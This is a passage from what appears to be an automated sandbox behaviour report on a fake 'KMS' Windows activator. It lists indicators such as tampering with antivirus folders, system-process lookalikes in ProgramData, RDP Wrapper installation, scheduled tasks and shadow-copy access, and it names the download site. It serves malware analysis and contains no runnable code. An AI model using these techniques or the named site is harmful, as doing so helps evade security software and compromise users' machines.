| File opened for modification | C:\Program Files (x86)\360 | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\AV | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Panda Security | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\IObit | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Transmission | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\ProgramData\Setup\smss.exe | N/A |
| File opened for modification | C:\Program Files\Malwarebytes | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\HitmanPro | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Kaspersky Lab | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Bitdefender Agent | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Wise | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\ByteFence | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Cezurity | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Rainmeter | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\ESET | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\SUPERAntiSpyware | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MSI\MSI Center | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\NETGATE | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Enigma Software Group | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\SpyHunter | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\AVG | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Ravantivirus | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\IObit\IObit Malware Fighter | C:\ProgramData\Setup\update.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification_fast.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-fr.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-te.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\nl\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-as.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\auto_open_controller.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\fi\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\nl\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\id\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Mini-Wallet\miniwallet.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-icon.svg | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-webui-992.268aa821c3090dce03cb.chunk.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-NL | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-ec\fi\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\el\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\zh-Hans\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_driver.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\edge_driver.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-ec\cs\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\fr-CA\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification_fast.bundle.js.LICENSE.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Tokenized-Card\tokenized-card.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-webui-708.de49febeeb0e9c77883f.chunk.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\ar\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\cs\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_700750315\deny_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\de\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\es\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-mn-cyrl.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-DE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\it\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\ar\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\fr-CA\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\fr\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\wallet\wallet-checkout\merchant-site-info.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-de-1996.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\runtime.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_1498492656\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-bg.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\product_page.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\hu\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\pt-BR\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-FR | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_2024013401\sets.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_1972247359\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\wallet\wallet-notification-config.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.html | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_checkout_page_validator.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\bnpl\bnpl.html | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\sv\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\el\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping468_693472959\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_700750315\deny_etld1_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-sl.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\crypto.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\de\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\zh-Hans\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Setup\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Setup\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\RDPWinst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\KMS Tools Lite Portable\GSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Microsoft\win.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Setup\smss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Setup\smss.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895695533523394" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\ProgramData\Setup\smss.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{6D6688C3-7945-484D-B534-F54B959BC780} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{B2EED048-F807-45D8-9CDA-850EE2E93D88} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database | C:\ProgramData\Setup\smss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\ProgramData\Setup\smss.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\Setup\winmgmts:\ | C:\ProgramData\Setup\IP.exe | N/A |
| File opened for modification | C:\ProgramData\Setup\WinMgmts:\ | C:\ProgramData\Setup\IP.exe | N/A |
| File opened for modification | C:\ProgramData\Setup\winmgmts:\ | C:\ProgramData\Setup\smss.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\KMS Tools Lite Portable\GSetup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\unsecapp.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\KMS Tools Lite Portable\GSetup.exe | N/A |
| N/A | N/A | C:\KMS Tools Lite Portable\GSetup.exe | N/A |
| N/A | N/A | C:\KMS Tools Lite Portable\GSetup.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://kms-auto.site/windows-10-activator/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x300,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2272,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2408,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3476,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5092,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5072,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4800,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:8
